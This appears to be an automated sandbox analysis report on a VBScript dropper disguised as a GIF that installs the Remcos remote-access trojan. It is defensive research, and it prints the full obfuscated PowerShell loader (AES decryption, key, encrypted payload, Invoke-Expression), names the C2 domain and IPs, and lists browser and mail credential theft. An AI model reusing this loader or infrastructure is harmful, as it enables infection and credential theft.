                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command (('((e4jfunction decrypt-aesencryption {param([string]tmibase64text,[stringe4j+e4j]tmikey)tmie4j+e4jaesmanaged = new-object system.see4j+e4jcurity.cryptography.aesmanaged;tmia'+'esmanagee4j+e4'+'jd.modee4j+e4j = [syse4j+'+'e4jtem.security.cryptoge4j+e4jraphy.e4j+e'+'4jcie4'+'j+e4jphermode]::cbc;tmiaesmanaged.'+'pae4j+e4jddin'+'g = [system.security.cryptography.paddingmode]::zeros;tmiaesmanaged.blocksiz'+'e = 128;tmiaesmanaged.keysize = 256;'+'tmiaesmanagee4j+'+'e4jd.key = ('+'new-objecte4'+'j+e4j system.security.cryptography.sha256managed).computehash([syste'+'m.text.encoding]::utf8.gee4j+e4jtbytes(tmikey));tmicipherbytes = [syst'+'em.convert]::frombase64string(tmibase64text);tmiaesmanaged.iv '+'= tmicipherbytes[0..15];tmidecryptor = tmiaesmanaged.createdecryptor();tmidecryptedbytes = tmidecryptor.transformfin'+'alblock(tmicipherbytes, 16, tmicipherbytes.length - 16);e4j+e4jtmiae'+'smanaged.d'+'ispose('+');return [system.text.encoding]::utf8.getstring'+'(tmidecry'+'ptedbytes).tre4j+e4jim([char]0);}tmichave = cni16942742004897547110020442916503cnie4j+e4j;tmitextocriptogr'+'afadobase4j+e4je64 = '+'cniaiyj4w4pdxrjybtpe+kcmxai0n0wfrewtqqo6ll9vcemso5/wu4wu8dficwqoqgghunsdgf18ada181zl+9aimrygbbhoql1xtrlupeyomibgkdw5hx/pyeqs0jw3vh2+cyhtxzw4maxppvkui6guliz8desop8ywwp+kl3lpnxuvod/qbkfflwtqldasslauzjbizi2g2z8ngqwpbshstgk8ixwe1n31tdvyvkp3t5t5wy1hmud74k+ymoudrhg5myz3dusqcna3ijfjlebg/zio/kcvqgjgfjjv8ugk/yy2p5oa+5qfogc8iixuoiniopayztidkvoogmbgfmbkku0xgvqmjjkcymtejtarogt9ayzx/ed96flgwk+okfu0gpy3zgarb0lj0uoulymaynqjjj3ofvs7de8jjcteqbknfr/caolbilhsynqwsogsdhrrvf5yyzmpm83vqh06v2szjv2yab9lsahigxjwtu+c0ovhz5vdqtl/xa+xpgcscc3s+9s4ottmjqd+y6ogggjtzyrp3pnltgtugxgv6fddehpsu/xdy/8gaxcgujh9mr8gb130pu+0ybw9hdbq2iwvdvhvmv9qexc/zgzm2wkprsh6kwtabvqcmsp7v0n0die/lfstsbi95dayr1r09j361kgvwhjfgtsyjktizxk3kjr8ned9ctp7hr1sis66dd0gkngvgibm3hqi4l/jbulztldoquscmtpojbmvvd+mpgtoxpgctnjjimltyvvp67c5k3tf8ib1o6pkqeqcxhq5hyr1qq3eq0hjl5zncjy/sut8qdltfucum3xrlxaeh032mipclizjhwfgmosjskijlds99v3vtpgcxzznxnns2du/73nt4uyfnd4j7+i54btgng1g4j6a5nhvo9kkofs0c0denf7cridemf7psj0injztc2arct3aejt3zvjwcbykoykpppt5njp0jlb5ab1obzoo8ytyn1zek16qtxf/udhcfshjs/b3tfxkd2trnhujolv+fes7istg3tpoffvrigpqfl4iglpip2k7alwxezhax+w9ftnkh054aimueyzsp0jtvg2vjbq1oafoqjhbvwqgkaazrnd+6l+lgqp6asijm8ttew0nyudisw5x5js0lelejrfsismbujrdpew/2ol5tavipcwawwofdzk+coq0ni1bv4ecz4/itbc8rsv1s7k18zvjwbyhmimm9irxaprgzkscaodhtkxf53rnwycy7cipt+8od/n5oytyzcvj7sdqkql5dqbvs23f23qxjw9fayzgdfz8roqgg9trdb2fyyffhpkwcgrn8f9ld4f+xjt70yid/tbdb3duwezhvgmnsbmoaw6o9dawkzehdjcdtozpnsktye26n8cig+nrxd0lhn5rbg3mlzmew==cni;tmitextodescriptografado = decrypt-aesencryption -'+'base64text tmitextocriptografadobase64 -key tmichave;w'+'rite-host cnitexe4j+e4jto descre4j+e4jiptografado: tmi'+'textodescriptograe4j+e4jfadocni;invoke-expressioe4j+e4jn tmitext'+'oe4j+e4jdescriptografado;e4j)-replace ([char]67+[char]110+['+'char]73),[char]34 -crep
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command (('((e4jfunction decrypt-aesencryption {param([string]tmibase64text,[stringe4j+e4j]tmikey)tmie4j+e4jaesmanaged = new-object system.see4j+e4jcurity.cryptography.aesmanaged;tmia'+'esmanagee4j+e4'+'jd.modee4j+e4j = [syse4j+'+'e4jtem.security.cryptoge4j+e4jraphy.e4j+e'+'4jcie4'+'j+e4jphermode]::cbc;tmiaesmanaged.'+'pae4j+e4jddin'+'g = [system.security.cryptography.paddingmode]::zeros;tmiaesmanaged.blocksiz'+'e = 128;tmiaesmanaged.keysize = 256;'+'tmiaesmanagee4j+'+'e4jd.key = ('+'new-objecte4'+'j+e4j system.security.cryptography.sha256managed).computehash([syste'+'m.text.encoding]::utf8.gee4j+e4jtbytes(tmikey));tmicipherbytes = [syst'+'em.convert]::frombase64string(tmibase64text);tmiaesmanaged.iv '+'= tmicipherbytes[0..15];tmidecryptor = tmiaesmanaged.createdecryptor();tmidecryptedbytes = tmidecryptor.transformfin'+'alblock(tmicipherbytes, 16, tmicipherbytes.length - 16);e4j+e4jtmiae'+'smanaged.d'+'ispose('+');return [system.text.encoding]::utf8.getstring'+'(tmidecry'+'ptedbytes).tre4j+e4jim([char]0);}tmichave = cni16942742004897547110020442916503cnie4j+e4j;tmitextocriptogr'+'afadobase4j+e4je64 = '+'cniaiyj4w4pdxrjybtpe+kcmxai0n0wfrewtqqo6ll9vcemso5/wu4wu8dficwqoqgghunsdgf18ada181zl+9aimrygbbhoql1xtrlupeyomibgkdw5hx/pyeqs0jw3vh2+cyhtxzw4maxppvkui6guliz8desop8ywwp+kl3lpnxuvod/qbkfflwtqldasslauzjbizi2g2z8ngqwpbshstgk8ixwe1n31tdvyvkp3t5t5wy1hmud74k+ymoudrhg5myz3dusqcna3ijfjlebg/zio/kcvqgjgfjjv8ugk/yy2p5oa+5qfogc8iixuoiniopayztidkvoogmbgfmbkku0xgvqmjjkcymtejtarogt9ayzx/ed96flgwk+okfu0gpy3zgarb0lj0uoulymaynqjjj3ofvs7de8jjcteqbknfr/caolbilhsynqwsogsdhrrvf5yyzmpm83vqh06v2szjv2yab9lsahigxjwtu+c0ovhz5vdqtl/xa+xpgcscc3s+9s4ottmjqd+y6ogggjtzyrp3pnltgtugxgv6fddehpsu/xdy/8gaxcgujh9mr8gb130pu+0ybw9hdbq2iwvdvhvmv9qexc/zgzm2wkprsh6kwtabvqcmsp7v0n0die/lfstsbi95dayr1r09j361kgvwhjfgtsyjktizxk3kjr8ned9ctp7hr1sis66dd0gkngvgibm3hqi4l/jbulztldoquscmtpojbmvvd+mpgtoxpgctnjjimltyvvp67c5k3tf8ib1o6pkqeqcxhq5hyr1qq3eq0hjl5zncjy/sut8qdltfucum3xrlxaeh032mipclizjhwfgmosjskijlds99v3vtpgcxzznxnns2du/73nt4uyfnd4j7+i54btgng1g4j6a5nhvo9kkofs0c0denf7cridemf7psj0injztc2arct3aejt3zvjwcbykoykpppt5njp0jlb5ab1obzoo8ytyn1zek16qtxf/udhcfshjs/b3tfxkd2trnhujolv+fes7istg3tpoffvrigpqfl4iglpip2k7alwxezhax+w9ftnkh054aimueyzsp0jtvg2vjbq1oafoqjhbvwqgkaazrnd+6l+lgqp6asijm8ttew0nyudisw5x5js0lelejrfsismbujrdpew/2ol5tavipcwawwofdzk+coq0ni1bv4ecz4/itbc8rsv1s7k18zvjwbyhmimm9irxaprgzkscaodhtkxf53rnwycy7cipt+8od/n5oytyzcvj7sdqkql5dqbvs23f23qxjw9fayzgdfz8roqgg9trdb2fyyffhpkwcgrn8f9ld4f+xjt70yid/tbdb3duwezhvgmnsbmoaw6o9dawkzehdjcdtozpnsktye26n8cig+nrxd0lhn5rbg3mlzmew==cni;tmitextodescriptografado = decrypt-aesencryption -'+'base64text tmitextocriptografadobase64 -key tmichave;w'+'rite-host cnitexe4j+e4jto descre4j+e4jiptografado: tmi'+'textodescriptograe4j+e4jfadocni;invoke-expressioe4j+e4jn tmitext'+'oe4j+e4jdescriptografado;e4j)-replace ([char]67+[char]110+['+'char]73),[char]34 -crepJump to behavior
                    Source: RegAsm.exe, 00000003.00000002.2929959756.0000000000F8A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2929959756.0000000000FD4000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2929959756.0000000000F5A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
                    Source: RegAsm.exe, 00000003.00000002.2929959756.0000000000FD4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerk
                    Source: RegAsm.exe, 00000003.00000002.2929959756.0000000000F5A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerYD\
                    Source: RegAsm.exe, 00000003.00000002.2929959756.0000000000F8A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2929959756.0000000000FA0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
                    Source: RegAsm.exe, 00000003.00000002.2929959756.0000000000F5A000.00000004.00000020.00020000.00000000.sdmp, logs.dat.3.drBinary or memory string: [Program Manager]
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00434C52 cpuid 3_2_00434C52
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoA,3_2_0040F8D1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,3_2_00452036
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,3_2_004520C3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,3_2_00452313
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,3_2_00448404
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,3_2_0045243C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,3_2_00452543
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,3_2_00452610
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,3_2_004488ED
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,3_2_00451CD8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,3_2_00451F50
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,3_2_00451F9B
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00404F51 GetLocalTime,CreateEventA,CreateThread,3_2_00404F51
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0041B60D GetComputerNameExW,GetUserNameW,3_2_0041B60D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004493AD _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,3_2_004493AD
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0041739B GetVersionExW,4_2_0041739B
                    Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Source: Yara matchFile source: 3.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.powershell.exe.1f163071700.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.powershell.exe.1f163071700.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000003.00000002.2929959756.0000000000F5A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.1760253899.000001F161F90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.1760253899.000001F162D9C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6744, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 1344, type: MEMORYSTR
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Notepo\logs.dat, type: DROPPED
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data3_2_0040BA12
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\3_2_0040BB30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: \key3.db3_2_0040BB30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic SaltJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic SaltJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\PaltalkJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live MailJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: ESMTPPassword5_2_004033F0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy, PopPassword5_2_00402DB3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy, SMTPPassword5_2_00402DB3
                    Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 1344, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7228, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-F4JFYDJump to behavior
                    Source: Yara matchFile source: 3.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.powershell.exe.1f163071700.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.powershell.exe.1f163071700.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000003.00000002.2929959756.0000000000F5A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.1760253899.000001F161F90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.1760253899.000001F162D9C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6744, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 1344, type: MEMORYSTR
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Notepo\logs.dat, type: DROPPED
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: cmd.exe3_2_0040569A
                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity Information231
                    Scripting
                    Valid Accounts11
                    Native API
                    231
                    Scripting
                    1
                    DLL Side-Loading
                    11
                    Deobfuscate/Decode Files or Information
                    2
                    OS Credential Dumping
                    2
                    System Time Discovery
                    Remote Services11
                    Archive Collected Data
                    12
                    Ingress Tool Transfer
                    Exfiltration Over Other Network Medium1
                    System Shutdown/Reboot
                    CredentialsDomainsDefault Accounts1
                    Exploitation for Client Execution
                    1
                    DLL Side-Loading
                    1
                    Bypass User Account Control
                    13
                    Obfuscated Files or Information
                    211
                    Input Capture
                    1
                    Account Discovery
                    Remote Desktop Protocol1
                    Data from Local System
                    2
                    Encrypted Channel
                    Exfiltration Over Bluetooth1
                    Defacement
                    Email AddressesDNS ServerDomain Accounts222
                    Command and Scripting Interpreter
                    1
                    Windows Service
                    1
                    Access Token Manipulation
                    1
                    DLL Side-Loading
                    2
                    Credentials in Registry
                    1
                    System Service Discovery
                    SMB/Windows Admin Shares1
                    Email Collection
                    1
                    Remote Access Software
                    Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal Accounts2
                    Service Execution
                    Login Hook1
                    Windows Service
                    1
                    Bypass User Account Control
                    3
                    Credentials In Files
                    3
                    File and Directory Discovery
                    Distributed Component Object Model211
                    Input Capture
                    2
                    Non-Application Layer Protocol
                    Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud Accounts2
                    PowerShell
                    Network Logon Script422
                    Process Injection
                    11
                    Masquerading
                    LSA Secrets38
                    System Information Discovery
                    SSH3
                    Clipboard Data
                    22
                    Application Layer Protocol
                    Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts21
                    Virtualization/Sandbox Evasion
                    Cached Domain Credentials31
                    Security Software Discovery
                    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                    Access Token Manipulation
                    DCSync21
                    Virtualization/Sandbox Evasion
                    Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job422
                    Process Injection
                    Proc Filesystem4
                    Process Discovery
                    Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
                    Application Window Discovery
                    Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                    IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                    System Owner/User Discovery
                    Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1483433 Sample: screensimplethingstohandlec... Startdate: 27/07/2024 Architecture: WINDOWS Score: 100 38 maveing.duckdns.org 2->38 40 geoplugin.net 2->40 54 Multi AV Scanner detection for domain / URL 2->54 56 Found malware configuration 2->56 58 Malicious sample detected (through community Yara rule) 2->58 62 17 other signatures 2->62 9 wscript.exe 1 2->9         started        signatures3 60 Uses dynamic DNS services 38->60 process4 signatures5 70 VBScript performs obfuscated calls to suspicious functions 9->70 72 Suspicious powershell command line found 9->72 74 Wscript starts Powershell (via cmd or directly) 9->74 76 4 other signatures 9->76 12 powershell.exe 14 15 9->12         started        process6 dnsIp7 42 192.3.176.154, 49731, 80 AS-COLOCROSSINGUS United States 12->42 44 198.46.176.133, 49730, 80 AS-COLOCROSSINGUS United States 12->44 78 Writes to foreign memory regions 12->78 80 Suspicious execution chain found 12->80 82 Injects a PE file into a foreign processes 12->82 16 RegAsm.exe 3 15 12->16         started        21 conhost.exe 12->21         started        signatures8 process9 dnsIp10 34 maveing.duckdns.org 192.3.101.142, 18576, 49732, 49733 AS-COLOCROSSINGUS United States 16->34 36 geoplugin.net 178.237.33.50, 49734, 80 ATOM86-ASATOM86NL Netherlands 16->36 32 C:\Users\user\AppData\Local\Temp\...\logs.dat, data 16->32 dropped 46 Contains functionality to bypass UAC (CMSTPLUA) 16->46 48 Detected Remcos RAT 16->48 50 Tries to steal Mail credentials (via file registry) 16->50 52 8 other signatures 16->52 23 RegAsm.exe 1 16->23         started        26 RegAsm.exe 1 16->26         started        28 RegAsm.exe 2 16->28         started        30 RegAsm.exe 16->30         started        file11 signatures12 process13 signatures14 64 Tries to steal Instant Messenger accounts or passwords 23->64 66 Tries to steal Mail credentials (via file / registry access) 23->66 68 Tries to harvest and steal browser information (history, passwords, etc) 26->68

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand
                    SourceDetectionScannerLabelLink
                    screensimplethingstohandlecream.gIF.vbs9%VirustotalBrowse
                    screensimplethingstohandlecream.gIF.vbs4%ReversingLabsWin32.Dropper.Generic
                    No Antivirus matches
                    No Antivirus matches
                    SourceDetectionScannerLabelLink
                    maveing.duckdns.org9%VirustotalBrowse
                    geoplugin.net1%VirustotalBrowse
                    SourceDetectionScannerLabelLink
                    http://www.imvu.comr0%URL Reputationsafe
                    http://www.imvu.comr0%URL Reputationsafe
                    https://contoso.com/License0%URL Reputationsafe
                    https://contoso.com/License0%URL Reputationsafe
                    https://deff.nelreports.net/api/report?cat=msn0%URL Reputationsafe
                    http://geoplugin.net/json.gp/C0%URL Reputationsafe
                    https://contoso.com/0%URL Reputationsafe
                    https://nuget.org/nuget.exe0%URL Reputationsafe
                    https://login.yahoo.com/config/login0%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                    https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg0%URL Reputationsafe
                    http://nuget.org/NuGet.exe0%URL Reputationsafe
                    http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                    http://www.apache.org/licenses/LICENSE-2.0.html0%URL Reputationsafe
                    http://www.imvu.com0%URL Reputationsafe
                    https://contoso.com/Icon0%URL Reputationsafe
                    http://geoplugin.net/json.gp0%URL Reputationsafe
                    https://aka.ms/pscore680%URL Reputationsafe
                    http://www.ebuddy.com0%URL Reputationsafe
                    https://86dd05e6f545b5502aade4a1946d3e9d.azr.footprintdns.com/apc/trans.gif?66601c3b572f284b9da07fcc0%Avira URL Cloudsafe
                    http://geoplugin.net/json.gp70%Avira URL Cloudsafe
                    https://aefd.nelreports.net/api/report?cat=bingth0%Avira URL Cloudsafe
                    https://ow1.res.office365.com/apc/trans.gif?29331761644ba41ebf9abf96ecc6fbad0%Avira URL Cloudsafe
                    https://M365CDN.nel.measure.office.net/api/report?FrontEnd=VerizonCDNWorldWide&DestinationEndpoint=W0%Avira URL Cloudsafe
                    http://www.nirsoft.net0%Avira URL Cloudsafe
                    https://aefd.nelreports.net/api/report?cat=bingaotak0%Avira URL Cloudsafe
                    http://geoplugin.net/json.gp70%VirustotalBrowse
                    https://aefd.nelreports.net/api/report?cat=bingth0%VirustotalBrowse
                    https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-BLUr5a&Fr0%Avira URL Cloudsafe
                    https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-BL2r8e&Fr0%Avira URL Cloudsafe
                    https://58293426822f9aaf9d7c729f28294583.azr.footprintdns.com/apc/trans.gif?fc66b8a78ab7a1394f56e7420%Avira URL Cloudsafe
                    https://aefd.nelreports.net/api/report?cat=bingaotak0%VirustotalBrowse
                    http://198.46.176.1330%Avira URL Cloudsafe
